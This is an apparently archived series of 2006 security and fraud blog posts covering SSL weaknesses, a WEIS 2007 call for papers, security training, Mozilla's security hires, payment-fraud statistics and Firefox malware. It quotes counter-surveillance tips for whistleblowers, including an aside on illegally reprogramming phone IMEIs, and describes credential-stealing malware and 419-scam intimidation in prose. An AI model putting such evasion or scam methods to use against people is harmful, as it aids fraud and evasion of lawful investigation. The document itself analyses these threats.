    You can't. We can't, I can't, nobody can rely on these things. Security models built on "just use SSL" or similar are somewhere between fatally flawed and nonsense for these reasons; for real security, security models that outsource the security to some other layer just don't cut the mustard.
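
    A minimal sketch of the end-to-end alternative, assuming the PyNaCl library (the key names and message are illustrative): the application encrypts its own payload and never asks whether some lower layer happens to be protecting it -- a question it cannot reliably answer anyway.

        from nacl.public import PrivateKey, Box

        sender = PrivateKey.generate()
        receiver = PrivateKey.generate()

        # No "encrypt / no-encrypt" button: every message goes through the
        # box, whatever the transport underneath may or may not be doing.
        wire = Box(sender, receiver.public_key).encrypt(b"pay 100 to Bob")

        # The receiver decrypts with its own key; lower-layer protection,
        # if present, is a bonus and never a dependency.
        assert Box(receiver, sender.public_key).decrypt(wire) == b"pay 100 to Bob"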

    But, the infrastructure is in place, which counts for something. So are there some tweaks that we can put in place to at least make it reasonably secure, whatever that means? Yes, they include these fairly minor tweaks:

    • put the CA's name on the chrome of the browser
    • implement SNI (everywhere but Opera :) -- see the sketch below
    • encrypt -- HTTPS -- everything all the time
    • utilise naming theory (add petnames to certs)
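
    For the SNI item above, a small sketch using Python's standard ssl module (the hostname is the standard example domain, used purely for illustration): server_hostname is what places the server's name in the TLS hello, which is what lets one IP serve many certificates.

        import socket, ssl

        ctx = ssl.create_default_context()
        with socket.create_connection(("example.com", 443)) as sock:
            # server_hostname sends the SNI extension in the client hello
            with ctx.wrap_socket(sock, server_hostname="example.com") as tls:
                print(tls.version(), tls.getpeercert()["subject"])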

    Spread the word! This won't stop phishing, but it will make it harder. And, it gets us closer to doing the hard re-engineering ... such as securing against MITB.


    Appendix: Alaric Daily posts this great example:

    Posted by iang at 05:04 PM | Comments (6) | TrackBack

    November 22, 2006

    CFP: 6W on the Economics of Information Security (WEIS 2007)

    The Sixth Workshop on the Economics of Information Security (WEIS 2007)

    The Heinz School, Carnegie Mellon University Pittsburgh (PA), USA
    June 7-8, 2007

    http://weis2007.econinfosec.org/

    C A L L F O R P A P E R S

    Submissions due: March 1, 2007

    How much should we spend on security? What incentives really drive privacy decisions? What are the trade-offs that individuals, firms, and governments face when allocating resources to protect data assets? Are there good ways to distribute risks and align goals when securing information systems?

    The 2007 Workshop on the Economics of Information Security builds on the success of the previous five Workshops and invites original research papers on topics related to the economics of information security and the economics of privacy. Security and privacy threats rarely have purely technical causes. Economic, behavioral, and legal factors often contribute as much as technology to the dependability of information and information systems. Until recently, research in security and dependability focused almost exclusively on technical factors, rather than incentives. The application of economic analysis to these problems has now become an exciting and fruitful area of research.

    We encourage economists, computer scientists, business school researchers, law scholars, security and privacy specialists, as well as industry experts to submit their research and attend the Workshop. Suggested topics include (but are not limited to) empirical and theoretical economic studies of:


    - Optimal security investment
    - Software and system dependability
    - Privacy, confidentiality, and anonymity
    - Vulnerabilities, patching, and disclosure
    - DRM and trusted computing
    - Trust and reputation systems
    - Security models and metrics
    - Behavioral security and privacy
    - Information systems liability and insurance
    - Information threat modeling and risk management
    - Phishing and spam


    **Important dates**

    - Submissions due: March 1, 2007
    - Notification of acceptance: April 10, 2007
    - Workshop: June 7-8, 2007

    For more information visit http://weis2007.econinfosec.org/.

    Posted by iang at 09:56 AM | Comments (0) | TrackBack

    October 23, 2006

    Tracking Threats - how whistleblowers can avoid tracking by cell/mobile

    Someone's paying attention to the tracking ability of mobile phones. Darrent points to Spyblog who suggests some tips to whistleblowers (those who sacrifice their careers and sometimes their liberty to reveal crimes in government and other places):

    8. Do not use your normal mobile phone to contact a journalist or blogger from your Home Office location, or from home. The Cell ID of your mobile phone will pinpoint your location in Marsham Street and the time and date of your call. This works identically for Short Message Service text messages as well as for Voice calls.

    Such Communications Traffic Data does not require that a warrant be signed by the Home Secretary; a much more junior official has the power to authorise it, e.g. the Home Office Departmental Security Unit headed by Jacqueline Sharland.

    9. Buy a cheap pre-paid mobile phone from a supermarket etc..

    • Do not buy the phone or top up phone credit using a Credit Card or make use of a Supermarket Loyalty Card.
    • Do not switch on or activate the new mobile at home or at work, or when your normal mobile phone is switched on (the first activation of a mobile phone has its physical location logged, and it is easy to see what other phones are active in the surrounding Cells at the same time).
    • Do not Register your pre-paid mobile phone, despite the tempting offers of "free" phone credit.
    • Do not store any friends or family or other business phone numbers on this disposable phone - only press or broadcast media or blogger contacts.
    • Set a power on PIN and a Security PIN code on the phone.
    • Physically destroy the phone and the SIM card once you have done your whistleblowing. Remember that your DNA and fingerprints will be on this mobile phone handset.
    • Do not be tempted to re-use the SIM in another phone or to put a fresh SIM in the old phone, unless you are confident about your ability to illegally re-program the International Mobile Equipment Identity (IMEI).

    Just in case you think this is excessive paranoia, it recently emerged that journalists in the USA and in Germany were having their phones monitored, by their national intelligence agencies, precisely to try to track down their "anonymous sources".

    Why would this not happen here in the UK ?

    See Computer Encryption and Mobile Phone evidence and the alleged justification for 90 days Detention Without Charge - Home Affairs Select Committee Oral Evidence 14th February 2006

    ...

    25. If you decide to meet with an alleged "journalist" or blogger (who may not always be who they claim to be), or if a journalist or blogger decides to meet with an "anonymous source" (who also might not be who they claim to be), then you should switch off your mobile phones, since the proximity of two mobile phones in the same approximate area, at the same time, is something which can be data mined from the Call Data Records, even if no phone conversations have taken place. Typically a mobile phone will handshake with the strongest Cell Base Station transmitter every 6 to 10 minutes, and this all gets logged, all of the time.

    Read the whole thing if it is important to you. Personally, I'd say that's a difficult list. If you are a suspect, don't use a cellphone. Not that I have a better idea (although I think Spyblog's comments on Skype are perhaps a little weak).
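    For the curious, the co-location mining in point 25 is trivially easy -- that is precisely the threat. A toy illustration in Python, with made-up records (no real CDR schema implied):

        from collections import defaultdict
        from itertools import combinations

        # (phone, cell_id, hour) -- bare location logs, no call content needed
        cdr = [
            ("source", "cell-17", 9), ("journalist", "cell-17", 9),
            ("source", "cell-04", 13), ("journalist", "cell-04", 13),
            ("commuter", "cell-17", 9),
        ]

        seen = defaultdict(set)
        for phone, cell, hour in cdr:
            seen[(cell, hour)].add(phone)

        colocated = defaultdict(int)
        for phones in seen.values():
            for a, b in combinations(sorted(phones), 2):
                colocated[(a, b)] += 1

        # ('journalist', 'source') scores highest: two distinct co-locations
        for pair, count in sorted(colocated.items(), key=lambda kv: -kv[1]):
            print(pair, count)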

    Posted by iang at 08:30 AM | Comments (2) | TrackBack

    October 06, 2006

    Why security training is really important (and it ain't anything to do with security!)

    Lynn mentioned in comments yesterday:

    I guess I have to admit to being on a roll.

    :-) Lynn grasped the nexus between the tea-room and the systems room yesterday:

    One of the big issues is inadequate design and/or assumptions ... in part, failing to assume that the operating environment is an extremely hostile environment with an enormous number of bad things that can happen.

    What I didn't stress was the reasons behind why security training was so important -- more important than your average CSO knows about. Lynn spots it above: reliability.

    The reason we benefit from teaching security (think Fight Club here, not the American Football) is that it clearly teaches how to build reliable systems. The problem addressed here is that unreliable systems fall foul of statistical enemies, which are weak, few and far between in small systems. But when you get to big systems and lots of transactions, those enemies become significant, and systems without reliability die the death of a thousand cuts.

    Security training solves this because it takes the statistical enemy up several notches and makes it apparent and dangerous even in small environments. And, once a mind is tuned to thinking of the attack of the aggressor, dealing with the statistical failure is easy: it's just an accidental case of what an aggressor could do deliberately.

    I would even assert that the enormous amounts of money spent attempting to patch an inadequate implementation can be orders of magnitude larger than the cost of doing it right in the first place.

    This is the conventional wisdom of the security industry -- and I disagree. Not because it doesn't make sense, and because it isn't true (it makes sense! and it's true!) but because time and time again, we've tried it and it has failed.

    The security industry is full of examples where we've spent huge amounts of money on up-front "adequate security," and it's been wasted. It is not full of examples where we've spent huge amounts of money up front, and it's paid off...

    Partly, the conventional security industry wisdom fails because it is far too easy for us to hang it all out in the tea-room and make like we actually know what we are talking about in security. It's simply too easy to blather such received wisdom. In the market for silver bullets, we simply don't know, and we share that absence of knowledge with phrases and images that lose meaning for their repetition. In such a market, we end up selling the wrong product for a big price -- payment up front, please!

    We are better off -- I assert -- saving our money until the wrong product shows itself to be wrong. Sell the wrong product by all means, but sell it cheaply. Live life a little dangerously, and let a few frauds happen. Ride the GP curve up and learn from your attackers.

    But of course, we don't really disagree, as Lynn immediately goes on to say:

    Some of this is security proportional to risk ... where it is also fundamental that what may be at risk is correctly identified.

    Right.

    To close with reference to yesterday's post: Security talk also easily impresses the managerial class, and this is another reason why we need "hackers" to "hack", to use today's unfortunate lingo. A breach of security, rendered before our very servers, speaks for itself, in terms that cut through the sales talk of the silver bullet sellers. A breach of security is a hard fact that can be fed into the above risk analysis, in a world where Spencarian signals abound.

    Posted by iang at 02:35 PM | Comments (4) | TrackBack

    October 05, 2006

    How the Classical Scholars dropped security from the canon of Computer Science

    Once upon a time we all went to CompSci school and had lots of fun.

    Then it all stopped. It stopped at different times at different places, of course, but it was always for the same reason. "You can't have fun," wagged the finger of some professor talking a lot of Greek.

    Well, it wasn't quite like that, but there is a germ of truth in the story. Have a look over at this post (spotted on EC) where the poster declares -- after a long-winded description of the benefits of a classical education -- that the computer science schools should add security to their canons, or core curricula. (Did I get the plurals right? If you know the answer you will have trouble following the rest of this post...)

    Teaching someone to validate input is easy. Teaching someone why they need to be rabid about doing it every single time - so that they internalize the importance of security - is hard. It's the ethics and values part of secure coding I really hate having to retrofit, not the technical bit. As it says in Proverbs 22:6, "Train a child in the way he should go, and when he is old he will not turn from it."

    This poster has it wrong, and I sense years in the classroom, under the ruler, doing verbs, adverbs and whatnots. No fun at all.

    Of course, the reason security is hard is because they -- the un-fun classical scholars -- don't provide any particular view as to why it is necessary, and modern programmers might not be able to eloquently fill in the gap, but they do make very economic decisions. Economics trumps ethics in all known competitions, so talking about "ethics and values of secure coding" is just more Greek.

    So what happened to the fun of it all? I speak of those age-old core skills now gone, the skills now bemoaned in the board rooms of just-hacked corporations the world around, as they frown over their SB1386s. To find out what happened to them, we have to go back a long time, to a time where titles mattered.

    Time was, a junior programmer didn't have a title, and his first skills were listening, coding and frothing.

    He listened, he coded and frothed, all under close supervision, and perchance entered the world's notice as a journeyman, being an unsupervised listener, coder and frother.

    In those days, the journeyman was called a hacker, because he was capable of hacking some bits and pieces together, of literally making a hack of something. It was a bit of a joke, really, but our hacker could get the job done, and it was better to be known as one than not being known at all. (One day he would aspire to become a guru or a wizard, but that's another story.)

    There was another lesser meaning to hacker, which derived from one of the journeyman's core classes in the canon -- breaching security. He was required to attack others' work. Not so as to break it but so as to understand it. To learn, and to appreciate why certain odd things were done in very certain but very odd ways.

    Breaching security was not only fun, it was a normal and necessary part of computer science. If you haven't done it, you aren't well rounded, and this is partly why I muck around in such non-PC areas such as poking holes in SSL. If I can poke holes in SSL, so the theory of secure protocols goes, then I'm ready -- perhaps -- to design my own.

    Indeed breaching security or its analogue is normal and essential in many disciplines; cryptology for example teaches that you should spend a decade or so attacking others' designs -- cryptanalysis -- before you ever should dare to make your own -- cryptography. Can you imagine doing a civil engineering course without bending some beams?

    (Back to the story.) And in due course, when a security system was breached, it became known as being hacked. Not because the verb was so intended, but by process of elimination some hacker had done it, pursuant to his studies. (Gurus did not need to practice, only discuss over cappuccinos. Juniors listened and didn't do anything unless told, mostly cleaning out the Atomic for another brew.)

    You can see where we are going now, so I'll hit fast-forward. More time passed ... more learning a.k.a. hacking ... The press grasped the sexy term and reversed the senses of the meaning.

    Some company had its security breached. Hacking became annoying. The fun diminishes... Then the viruses, then the trojans, the DDOS, the phishing, the ....

    And it all got lumped together under one bad name and made bad. Rustication for some, "Resigned" for others, Jail for some unfortunates.

    That's how computer science lost the security skills from the canon. It was dropped from the University curricula by people who didn't understand that it was there for a reason. Bureaucrats, lawmakers, police, and especially corporates who didn't want to do security and preferred to blame others, etc etc, the list of naysayers is very long.

    Having stripped it from computer science, we are now in a world where security is not taught, and we need to ask what they suggest in its place:

    There are some bright security spots in the academic environs. For example, one professor I talked to at Stanford in the CS department - in a non-security class, no less - had his students "red team" and "blue team" their homework, to stress that any and all homework had to be unhackable. Go, Stanford! Part of your grade was your homework, but your grade was reduced if a classmate could hack it. As it should be.

    Right, pretend hacking exercises. Also, security conferences. Nice in spirit, but the implementation is a rather poor copy of the original. Indeed, if you think about the dynamics of hacking games and security conferences ("Nobody ever got hacked going to Blue Hat??") we aren't likely to sigh with relief.

    And then:

    One of my colleagues in industry has an even more draconian (but necessary) suggestion for enforcing change upon universities. ... He decided that one way to get people's attention was to ask Congress to tie research funds to universities to changing the computer science curriculum. I dare say if universities' research grants were held up, they might find the extra time or muster the will to change their curricula!

    Heaven help us! Are we to believe that the solution to the security training quandary is to ask the government to tell us how to do security training? Tell me this is a joke, and the Hello Kitty People haven't taken over our future:

    The Hello Kitty people are those teenagers who put their personal lives on MySpace and then complain that their privacy is being violated. They are the TV viewers who think that the Hurricane Katrina rescue or the Iraq war were screwed up only because we don't, they belatedly discover, have actual Hello Kitties in political power. When inevitably some of world's Kitties, unknown beyond their cute image, turn out to be less than fully trustworthy, the chorus of yowling Kitty People becomes unbearable cacophony.

    (We've written before about how perhaps the greatest direct enemy of Internet security is the government, so we won't repeat today.)

    Here is a test. A corporation such as Oracle could do this, instead of blaming the government or the hackers or other corporations for its security woes. Or Microsoft could do it, or anyone, really.

    Simply instruct all your people to breach security. Fill in the missing element in the canon. Breach something, today, and learn.

    Obviously, the Greeks will complain about the errant irresponsibility of such support for crime ... but just as obviously, if they were to do that, their security knowledge would go up by leaps and bounds.

    Sadly, if this were taken seriously, modern corporations such as Oracle would collapse in a heap. It's far cheaper to drop the training, blame "the hackers" and ask the government for a subsidy.

    Even more sadly, we just don't have a better version of training than "weapons free." But let's at least realise that this is the issue: you classicals, you bureaucrats, you Sonys and Oracles and Suns, you scared insecure corporations have brought us to where we are now, so don't blame the Universities, blame yourselves.

    And, in the name of all that is sacred, *don't ask the government for help!*

    Posted by iang at 06:58 PM | Comments (6) | TrackBack

    October 03, 2006

    The Last Link of Security

    Vlad Miller writes from Russia (translated by Daniel Nagy):

    We can invent any algorithm, develop any protocol, build any system, but, no matter how secure and reliable they are, it is the human taking the final decision that remains the last link of security. And, taking into account the peculiarities of human nature, the least reliable link, at that, limiting the security of the entire system. All of this has long been an axiom, but I would like to share a curious case, which serves as yet another confirmation of this fact.

    We all visit banks. Banks, in addition to being financial organizations attracting and investing their clients' funds, are complex systems of informational, physical and economic defenses for the deposited cash and account money. Economic defenses are based on procedures of confirming and controlling transactions, informational defenses -- on measures and procedures guarding the information about transactions, personal, financial and other data, while physical defenses comprise the building and maintenance of a secure physical perimeter around the guarded objects: buildings, rooms and valuable items.

    Yet, regardless of the well-coordinated nature of the whole process, final decisions are always taken by humans: the guard decides whether or not to let the employee that forgot his ID through the checkpoint; the teller decides whether a person is indeed the owner of the passport and the account he claims to own; the cashier decides whether or not there is anything suspicious in the presented order. A failure can occur at any point, and not only as a consequence of fraudulent activities, but also due to carelessness or lack of attention on the part of the bank's employee, a link of the security system.

    Not too long ago, I was in my bank to deposit some cash on my account. The teller checked my passport, compared my looks to the photo within, took my book and signed a deposit order for the given amount. The same data were duplicated in the bank's information system and the order with my book were passed on to the cashier. Meanwhile, I was given a token with the transaction number, which I should have presented to the cashier so that she could process the corresponding order. Everybody is familiar with this procedure; it may differ a bit from bank to bank, but the general principles are the same.

    Walking over to the cashier, I executed my part of the protocol by handing over the token to the cashier (but I did not put the cash into the drawer before having been asked to do so). She looked at my order, affixed her signature to it and to my book and ... took a few decks of banknotes out of the safe and started feeding them to the counting machine. I got curious how long it would take for the young lady to realize the error in her actions, and did not interrupt her noble thrust. And only when she turned around to put the cash into the drawer did I delicately remark that I did not expect such a present for March 8 and that I came to deposit some cash, not to withdraw. For a few seconds, the young lady gave me a confused look, then, after looking at the order and crossing herself, thanked me for saving her from being fired.

    The banking system relies a great deal on governmental mechanisms of prevention, control and reaction. Had I not, in computer-speak, interrupted the execution of the miscarried protocol, but instead left the bank with the doubled amount of money, it would not have led to anything except the confiscation of the amount of my "unfounded enrichment". The last link of security is unreliable: it fails at random and is highly vulnerable to various interferences and influences. This is why control and reaction are no less important than prevention of attacks and failures.
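    In software terms, the failure was a skipped branch: the order's *type* was never consulted before the cash came out of the safe. A minimal sketch (mine, not any bank's system) of the check the cashier's software could enforce:

        from dataclasses import dataclass

        @dataclass
        class Order:
            txn_id: int
            kind: str      # "DEPOSIT" or "WITHDRAWAL"
            amount: int

        def cashier_step(order: Order, token_txn_id: int) -> str:
            if token_txn_id != order.txn_id:
                raise ValueError("token does not match order")
            if order.kind == "DEPOSIT":
                return f"ask the client for {order.amount}, count it, stamp the book"
            if order.kind == "WITHDRAWAL":
                return f"count out {order.amount} and hand it over"
            raise ValueError("unknown order type")

        print(cashier_step(Order(42, "DEPOSIT", 10_000), token_txn_id=42))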

    Posted by iang at 11:36 AM | Comments (0) | TrackBack

    September 27, 2006

    Mozilla moves on security

    A couple of improvements have already been signalled at Mozilla in security terms since the appointment of Window Snyder as single security chair, for those interested (and as Firefox has 10-20% of the browser market, it is somewhat important). Check out this interview.

    1. Understanding of what the word 'security' means:
      What is the key rule that you live by in terms of security?
      Snyder: That nothing is secure. ...

    ( Adi Shamir says that absolutely secure systems don't exist. Lynn's version: "can you say security proportional to risk?" I say Pareto-secure ... Of course, to risk practitioners, this is just journeyman stuff. )


    2. Avoidance of battle on the plain of "most secure browser":

      So the answer, in one word: Is Firefox more secure than Internet Explorer?
      Snyder: I don't think there is a one-word answer for that question.

      If ever there was a battle that was unwinnable, that was it. It quite possibly needed someone who had extensive and internal experience of MS to nail that one for Mozo.


    3. Here's the one I was curious about:

      You dealt with security researchers at Microsoft and will deal with them at Mozilla. How do you see the community? There have been several cases where researchers have gone public with Firefox flaws.
      Snyder: The security research community I see as another part of the Mozilla community. There's an opportunity for these people, if they get excited about the Mozilla project, to really contribute. They can contribute to secure design, they can suggest features, they can help us identify vulnerabilities, and they can help us test it. They can help us build tools to find more vulnerabilities. The spectrum is much broader (than with commercial products) in ways the research community can contribute to this project.

      Earlier, Snyder said:

      Snyder: There has been a lot of great work done. I think there is a great opportunity to continue that work and make the entire process available externally.

      Is this a move towards opening Mozilla's closed security process? If so, that would be most welcome.

    And in other news, Firefox 2.0 is almost here:

    Version 2.0 of the software will still feature a raft of new features including an integrated in-line spell checker, as well as an anti-phishing tool (a must-have accessory that's in Opera 9 and will be included in IE 7),...

    Hopefully someone will get a chance to review the anti-phishing tool (!) and compare it to the efforts of the research community over the last few years.

    Posted by iang at 03:36 PM | Comments (4) | TrackBack

    September 07, 2006

    Mozilla now has a "Chief Security Something"

    One of the big problems with Mozilla was that they didn't have a Security Czar. This lack meant that far-reaching threats such as phishing failed to be addressed because the scope was too broad for the existing specialists, and as Firefox now takes the teens in browser market share, that's a big issue.

    Now they do! Excellent news, reported over on "schrep's blog":

    Window has joined MozCorp recently as our new "Chief Security Something" (that's a working title :-)). She'll be the public voice of Mozilla Corporation on security issues and helping to drive our long-term security strategy.

    Congrats! Also, article at eWeek

    Spotted by Adam.

    Posted by iang at 06:53 AM | Comments (0) | TrackBack

    August 24, 2006

    Fraudwatch - how much a Brit costs, how to be a 419-er, Sarbanes-Oxley rises as fraud rises, the real Piracy

    A BBC programme reported the cost of Brit identities as extracted from recycled PCs:

    Bank account details belonging to thousands of Britons are being sold in West Africa for less than £20 each, the BBC's Real Story programme has found.

    Which comes as the EU moves to total passenger tracking:

    BIOMETRIC testing is set to be introduced at European airports under plans for stringent new security measures revealed yesterday in the wake of last week's alleged terror plot. Passengers would have their fingerprint or iris scanned under the measures proposed by EU interior ministers, which would also use passenger profiling to try to identify potential terrorists.

    Here's some stats on Nigerian 419 scams, another deception with higher risks for the consumer but not the retailer:

    He sent 500 e-mails a day and usually received about seven replies. Shepherd would then take over. "When you get a reply, it's 70% sure that you'll get the money," Samuel said. ... By 2003, Shepherd was fleecing 25 to 40 victims a month, Samuel said. Samuel never got the 20%, but still made a minimum of $900 a month, three times the average income here. At times, he made $6,000 to $7,000 a month.

    Samuel said Shepherd employs seven Nigerians in America, including one in the San Francisco Bay Area, to spy on maghas and threaten any who get cold feet. If a big deal is going off track, he calls in all seven.

    "They're all graduates and very smart," Samuel said. "Four of them are graduates in psychology here in Nigeria. If the white guy is getting suspicious, he'll call them all in and say, 'Can you finish this off for me?'

    "They'll try to scare you that you're not going to get out of it. Or you're going to be arrested and you will face trial in Nigeria. They'll say: 'We know you were at Wal-Mart yesterday. We know the D.A. He's our friend.' "

    "They'll tell you that you are in too deep - you either complete it or you'll be killed."

    Anyone want to hazard when crooks will be able to buy European biometric data in Africa? More from the BBC.

    Once in a blue moon, using dodgy identity cards seems not to work (dead link):

    A Toronto man who wanted a fraudulent driver's licence added to his collection of counterfeit ID was foiled by a sharp-eyed employee with the Ministry of Transportation in Hamilton. .... The convicted man provided a Canadian citizenship card in the name of Rohan Omar Kelly when he showed up with a friend on June 12 to write a driver's exam at the ministry's Kenilworth Avenue office.

    The employee took a long, hard look at his identification and discreetly slipped away to call the police.

    Meanwhile, his friend presented a credit card to pay for the fictitious Kelly's fee. The card, as it would turn out when the pair was arrested a short time later, was a pirated copy. The same was true for a Canadian social insurance card seized from Thomas and a second citizenship card that police found on the dash of the friend's Chev Malibu parked outside.

    I wouldn't suggest you do that at home, folks! Fraud responds well to natural selection; the dumb crooks get caught, leaving the smart ones. Actually, the smart ones get caught too, but not before training two more up.

    Laws on fraud enjoy no such control; they just get bigger and dumber. CompliancePipeline reports on the anti-climax of Sarbanes-Oxley:

    The top-level findings show that even in the more heavily regulated business environment, the incidence of fraud continues to increase. Sixty-seven percent of the respondents indicated that institutional fraud is more prevalent today than five years ago, and another 27 percent said there has been no change in the level of fraud activity.

    Probably, Sarbanes-Oxley supporters will say that they just need to try harder, write more rules, bust more companies, etc etc. Perhaps they should create identity trails as part of their data? New figures suggest identity theft is becoming more valuable, but that's no reason not to store massive amounts of identity information:

    Nearly 10 million consumers were victimized by some form of identity theft in 2004 alone. That equals 19,178 people per day, 799 per hour and 13.3 per minute. Consumers have reportedly lost over US$5 million, and businesses have lost an estimated $50 billion or more.

    A few years back the accepted figure for identity theft in the USA was around $10bn; maybe it is being revised upwards to $50bn or more (?) with inclusion of internal (unreported) corporate costs.

    And, let's close with a curious comparison: Cubicle reports on stats on the real Piracy!

    …there is very little financial incentive for both governments and shippers to deal with this crime. Piracy is costing shippers $.32 for every $10,000 of goods shipped estimates David N. Kellerman of Maritime Security. Not only is the economic cost inconsequential to companies, so it is to some governments.

    Sound familiar? If I’m the corporate owner, the cost is inconsequential. If I’m a sailor on one of these ships, though, the cost is a little more significant:

    Merely one year before, in September of 1998, a smaller Japanese-owned freighter named the Tenyu had gone missing soon after departing from the same port of Kuala Tanjung with a similar load of aluminum, and a crew of fifteen. Three months later the Tenyu was discovered under a changed name and flag in a Chinese port, but the cargo was missing, as was the original crew, all of whom are presumed to have been killed.

    Ship owners can transfer the risk of Piracy with insurance, but sailors only have two options. They can either avoid the risk by finding a new vocation (merely declining to sail on vessels which travel through pirate-prone regions is not really an option), or hope that the shipowners mitigate it by implementing anti-piracy safeguards such as anti-boarding defenses or armed guards, at least for passing through piracy-prone areas.

    Somehow, identity theft seems a little more comfortable.

    Posted by iang at 11:55 PM | Comments (2) | TrackBack

    August 16, 2006

    Fraudwatch - Chip&PIN one-sided story, banks and deception and liability shifts

    First some good news from PaymentNews:

    APACS, the UK payment association, has announced that six months after "PIN day" (Valentine's Day 2006, February 14th), the UK is the world's first chip and PIN success story - with more than 99.8% of all chip and PIN card transactions now PIN-verified, and more than 150 chip and PIN transactions taking place every second (compared with 125 a second six months ago and 85 a second a year ago).

    The UK’s banks and card companies have now issued 130 million chip and PIN cards representing 92% of a total of 141 million cards. Approximately 850,000 tills have been upgraded to chip and PIN, representing 87 per cent of all tills in the UK - and retailers have reported that "transaction times have become quicker with queues in shops shorter." In addition, in 2005 there was a reduction of nearly £60m in counterfeit and fraud on lost and stolen cards (a drop of 24%) compared to 2004.

    Said Sandra Quinn of chip and PIN: “Britain is now a truly mature chip and PIN nation. Millions of people have adapted to the change with no problems at all. This means that we are all a lot safer when we go shopping, and that fraudsters have been denied millions of pounds of stolen money. Of course it hasn’t eradicated fraud, it never could, as fraudsters will continue to target us and our money. But it is a fact that chip and PIN has made our cards safer than they were two years ago and banks and retailers will continue to work together to keep it this way. Now we need to remain vigilant, as fraudsters will always try to find other ways to get hold of our money. That is why we are constantly reminding cardholders how to protect themselves from fraud.”

    Now, readers will recall recent trouble when the new chip and PIN cards suffered some fraud. What we see above is the success story but only a mention of the failure story, leaving us unsure what to make of the numbers. Last year, APACS reported that Internet fraud now accounts for one quarter of all fraud losses in the UK, so they are certainly capable of reporting fraud.

    Here's an older story giving some indication (again from APACS):

    The Scotsman reports on the impact on card fraud from the introduction of chip and PIN technology in the UK, reducing credit and debit card losses by 13 percent in the first six months of 2005.

    The figures showed counterfeit card fraud fell by 31%, fraud on lost or stolen cards dropped by 27%, losses on cards that went missing in the mail were 37% lower, and identity theft on payment cards was down by 16%.

    Not quite as rosy as the chip&PIN story would have us believe, and others are skeptical. Meanwhile, more tarnish on the image of the US banks for deceptive practices:

    The Office of the Comptroller of the Currency has issued new guidance on disclosure and marketing issues associated with gift cards - focusing on "the need for national banks that issue gift cards to do so in a manner in which both purchasers and recipients are fully informed of the product's terms and conditions." ... Basic information that is most essential to a gift card recipient's decisions about when and how to use the card should be provided on the gift card itself, or on a sticker or tape affixed to the gift card. Disclosures should generally tell consumers:
    • The expiration date of the card (which should appear on the front of the card);
    • The amount or the existence of any monthly maintenance, dormancy, usage or similar fees;
    • How to obtain additional information about their cards or other customer service (for example, by providing a toll free number or website address).

    The OCC's new guidance also advises national banks to avoid practices that could be misleading to consumers. For example, issuers should not advertise a gift card with "no expiration date" if monthly service or maintenance fees, dormancy fees or similar charges can consume the card balance. Similarly, if fees may consume the card balance before the stated expiration date, disclosures related to that expiration date should explain that possibility. Issuers should also avoid describing gift cards as if they are gift certificates or other payment instruments more familiar to consumers, or as products that carry federal deposit insurance.

    This is bad news because it indicates that deceptive behaviour is prevalent in the gift card business. (Note that the pre-paid / gift card business is exploding, as Dave Birch reports and as I mooted last year in bull #4; i.e., this is a significant sector for financial cryptographers to track. From PN, see also WSJ and Teenage spending.)

    One would expect that banks would not engage in such ... but the need for guidance suggests otherwise. Indeed, is the following deceptive behaviour by APACS, in the aforementioned press release?

    The consumer continues to be protected from card fraud losses by The Banking Code. Nothing changes for the consumer. Just as now, cardholders do need to be responsible in protecting their cards and keep their PIN a secret.

    Right. But what about the retailers and any liability shift in chip & PIN? And, to underscore the ability of the banks to shift liability:

    The survey of 2,000 net users found that five per cent had fallen victim to scams and had lost out financially. Half of victims received no compensation from their banks while one in ten is still waiting for the matter to be resolved.

    Here's more evidence of how easy it is to fool people, from a random survey someone ran as ID theft bait:

    • More than 70% of respondents gave up their mother's maiden name
    • More than 90% of people provided both their date and place of birth
    • Nearly 55% explained how they devise their online passwords
    • Nearly 85% of respondents provided their full name, current street address, and email address

    Is card fraud going up or down? Visa says down:

    Visa says fraud accounts for about 7 cents of every $100 spent on its credit cards, an all-time low and about half the rate of 10 years ago.

    And APACS says up:

    Last year, credit card fraud was equivalent to £12 for every cardholder in the UK. The amount lost every year has jumped by a massive 600 percent over the last six years. Last year, the Which? survey had found that six percent of current account holders and five percent of credit card holders had been a victim of fraud at some point of time. The Association of Payment Clearing Services (APACS) says that UK card fraud hit over £500 million last year, a 20 percent rise from the figures in 2003.

    CyberSource says up, for retailers (but original Yahoo source is lost):

    CyberSource has announced the results of its 7th annual CyberSource Fraud Survey. Among the survey's findings, the estimate for ecommerce fraud losses increased to more than $2.8 billion for 2005, an 8% increase over the year before. Although the overall rate of fraud loss remained relatively constant at 1.6% of revenue, mid-to-large merchants selling $5-$25 million annually online reported fraud losses increasing from 1.5% to 1.8% of revenue while those selling over $25 million reported losses increasing from 1.1% to 1.2% of revenue.

    So maybe we can suspect that the banks are becoming more successful in shifting the fraud losses away from themselves and on to consumers and/or retailers. JPM reports that it's ever present:

    Retail operations have "slippage" (shop lifting) ... it is just built right in to the figures. They expect that slippage will be 4% on an ongoing basis, but 3% in video stores, but 5% in candy stores, 0.05% in petrol stations ("drive offs"), etc.
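    A back-of-the-envelope normalisation of the quoted figures into basis points of turnover -- my arithmetic, only as good as the quoted numbers -- shows how far apart these "rates" really are:

        quoted = {
            "Visa card fraud (7c per $100)":         0.07 / 100,
            "CyberSource e-commerce fraud, overall": 1.6 / 100,
            "JPM retail slippage, typical":          4.0 / 100,
            "JPM slippage, petrol drive-offs":       0.05 / 100,
        }
        for label, rate in quoted.items():
            print(f"{label}: {rate * 10_000:.0f} bp of turnover")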

    Plenty of room to shift out some bank liabilities then! The problem with shifting the liabilities is that the consumer pays in the end, regardless of how the cut is taken. So our objective should not be for any one party to just reduce their own liabilities -- they can always pass it on -- but instead to identify the most efficient place to accept and pay for the frauds.

    Where is that place, then? And, where is the debate about how payment systems operators, retailers and consumers create that efficient sharing?

    Posted by iang at 09:04 AM | Comments (3) | TrackBack

    July 28, 2006

    Firefox as a mainstream security risk - three threats

    As predicted, Firefox is now a member of that unenviable club -- "fair game" for crackers:

    Upon successful execution, FormSpy hooks mouse and keyboard events in the Mozilla Firefox web browser. It can then forward information such as credit card numbers, passwords and URLs typed in the browser to a malicious website hosted at IP address 81.95.xx.xx.
    And, a bunch of reports on a security advisory 1, 2, 3, 4.

    Also, a very strange one, in which PrivSoft, a security firm, labelled a root key from the Bermudan certificate authority QuoVadis as viral:

